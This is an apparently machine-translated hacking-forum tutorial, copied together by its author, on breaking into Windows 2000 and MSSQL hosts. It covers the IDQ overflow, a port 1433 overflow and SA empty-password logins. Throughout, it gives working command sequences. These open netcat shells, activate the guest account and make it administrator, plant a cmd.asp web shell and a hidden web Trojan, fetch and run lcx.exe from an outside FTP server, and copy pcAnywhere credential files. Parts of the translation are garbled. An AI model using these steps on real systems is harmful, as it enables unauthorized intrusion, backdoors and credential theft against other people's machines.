Cainiao intrusion overflow Learning (figure)

Overflow special set --------- in view of the opinions of netizens, this special set was specially released, including the known overflow vulnerabilities.

I am a lazy person. I think it saves me a lot of time, so I copied the articles I can find online. I don't want to waste any time. If I don't have to, I have to work hard.

Idq Overflow

Required systems and tools: Win 98/ME/2000/NT, idqgui tools. Superscan scanner. NC. exe
This method is valid for Windows 2000 host.
Step 1:
Run the superscan scanner, define the IP address segment, and set the scan port to 3389. In this way, you will be able to scan several machines with 3389 ports on.
Step 2:

Run the idqgui program and a window appears,

Fill in the Host IP address to be intruded, and select the corresponding system SP patch bar. If other settings are not changed, the default value is used. Then press the idq out key in the lower right corner.

If the connection fails, a connection error is displayed.

Step 3:

After the connection is successful, open the DoS Status in win and enter nc-VV x. x 813.

If it fails, you can try another SP patch bar in the idqgui program. If not, give up. Change to another vulnerable machine.

After successful creation, you can use net user to create users and use net localgroup to add administrator permissions. So that you can use the 2000 client

When you enter the host, you have another zombie.

To sum up, each method uses different combinations of tools to produce different results. Therefore, more lab exercises are required after the operation is successful. In this way. Some friends say it is not successful. In fact, this is because the target host hits SP3. The overflow vulnerability is invalid for the host that hits SP3!

If MSSQL is installed on Win2000, port 1433 is enabled. What is port? Just like the window for food in the canteen, you can buy cabbage and window 1 and window 2 with tomatoes. If you buy MsSQL on the machine, the window is 1433. Overflow 1433 requires two tools: nc.exeand sql2.exe www.sandflee.net. The attack method takes two steps: Step 1: open a cmd window on your machine. By the way, if you want to use Win2000, start-run-write CMD and press Enter. We only use 2000 here, not 98. If you put your nc.exeand sql2.exe on the C: disk like I used to, run the C:> nc-l-P 40 command in the window you opened and press Enter. This step means to use the NC tool to enable a port listening of 40. Step 2: Start-run-write CMD and press enter to open another window. In this window, write the command line C:> sql2.exe and press Enter. Here we want to explain how to get the IP address of the website that has been infiltrated? In cmd, You Can See C:> pinwww.xxxxx.com. What about your own IP address? In cmd, You Can See C:> ipconfig. You can change 40 in the command line to another, but it seems that the success rate of 40 and 53 is a little higher. If 0 in the Command fails, try 1 or 2. If this vulnerability exists in the website, the first window you open will become a zombie C:/winnt/system32>. That is to say, you have already entered its machine. After entering, you can add a user. Net user guest/active: Yes Use this command to activate the disabled Guest user by default. Net user guest 123456 and the password of guest is changed to 123456. Net localgroup administrators guest/Add. This is the highest privilege administrator for guest.

 

Second: 1433 empty password intrusion. 1433 another vulnerability is that, if installed by default, the user name is SA and the password is empty. So we can connect to it with supersqlexec.exe, which is also available in www.sandflee.net. Let's take a look at the intrusion method. I previously posted in the Forum: 20 steps of SA empty password intrusion script under LCX Win98
1. How do I find the SA empty password zombie? Use the streamer to scan the image.
2. Note that this is the actual situation of SAS intrusion under Win98. Win98 in the LAN is in the Internet cafe.
3. Tools: supersqlexec.exe, cmd. asp (under www.sandflee.net) Haiyang top Network Trojan (black and white) placed in the Local Machine F: Disk
4. The connection is successful with supersqlexec. Enter:

Net user guest/active: Yes
(> Refers to the echo of a zombie.) The command completed successfully.
Net user guest 123456.
> The command completed successfully
Net localgroup administrators guest/Add
> The command completed successfully.
After these commands are completed, the guest user is activated, the password is 123456, and upgraded to admin. This is another command. review it.
5. I was pleasantly surprised to switch to the 2000 system where the light-emitting growers started to plant a glacier for it. It's strange that it won't succeed in any case. (In fact, sometimes the light growers do not succeed, but you can do it manually. See here ).
6. Change the user name. Go back to the supersqlexe.exe command mode. Net user LCX 123456/Add. The command fails. IPC not enabled on the server $?
7. Returning to the sqlexe command line, the Net start LanmanServer bot shows that IPC $ is started. Why can't the stream be connected in this step. (Note: Net start command list) net use // ip/IPC $ content $ nbsp; "123456"/User: "Guest" cannot be connected.
8. Change your mind. Set "F:" to "share" on the local machine. In dos, ipconfig.exe learns the IP address of the local machine.
9. Return to net use X: // local IP/F in the sqlexe command line and map the local F: disk to the X: disk of the zombie. After a while, the server displays that the command is successfully completed. (LCX Note: detailed usage of the net command)
10. Run set in the sqlexe command line to find that the home page is located at D:/inetpub/wwwroot. Yes, the server supports ASP. If you do not understand this command, you can also search for its home page Location Based on an image file name on its home page and dir *. jpg/s.
11. Copy X:/CMD. asp D:/inetpub/wwwroot in the sqlexe command line. This directory is the directory of the zombie website.
12. Return to http: // server IP Address/CMD. asp in IE, And the DOS. Create a folder on the IE interface.
Md d:/inetpub/wwwroot/aspmm
13. Copy X:/Haiyang top Network Trojan in sqlexec command line/*. * D:/inetpub/wwwroot/aspmm/. Then hide the Directory
Attrib + h d:/inetpub/wwwroot/aspmm
14. Now you can use the Haiyang top Network Trojan to upload any files. It has full control over zombie text files. Of course, you can also copy through ing! This server does not support FSO, and Haiyang top Network Trojan cannot run. So let's try FTP upload. Upload your file *. EXE to the personal homepage.
15.create up.txt on the local machine as follows:
Open ftp1.go.163.com (Note: Netease FTP is used here)
Username (Description: Your upload username)
Password (Description: password)
Get lcx.exe (Description: name of the file to be uploaded to the zombie)
Bye (Description: Exit FTP)
Copy to C:/up.txt of broilers by ing
16. FTP-S: C:/up.txt in sqlexec command line (Note: you can find the ftp usage in detail in Win2000 help) after a while, you will see that lcx.exe is already running in/winnt/system32.
17. If you are lucky, you should be able to successfully connect to IPC and open a port. Then I can act as an agent and a stepping stone. Unfortunately, I am not lucky. This machine cannot be successfully IPC $, and the streamer cannot be connected. Several EXE Trojans uploaded cannot be run. The second section describes how to run the uploaded Trojan.
18. after careful searching, we found that the zombie installed pcAnywhere. check *. the file is stored in the C:/winnt/profiles/all users/Application Data/Symantec/pcAnywhere directory. How to copy it?
19. The following information should be learned through the one-day dos8.3 Tutorial:
Copy C:/winnt/profiles/alluse ~ 1/applic ~ 2/Symantec/pcanyw ~ 1/*. cif d:/inetpub/wwwroot/. Then download it through IE. In fact, you can also use ASP to write a small program copy. I wrote one here. I put it here. Note:
Http://www.s8s8.net/cgi-bin/topic.cgi? Forum = 26 & topic = 741
20. The user name and password are obtained after the CIF file is decoded. The only pity is that the IPC $ fails and the port cannot be opened, but the Guest user can activate it for unknown reasons.

After supersqlexec.exe is connected, there are many methods. You can also use echoto write the up.txt I mentioned in Step 15.
ECHO What You Want To write> up.txt. Although the zombie Echo says that the write failed, it has actually succeeded. It's like a person shouting to catch a thief. The thief is scared away, but the house is in a mess. Note: You can use echo to write only one row at a time.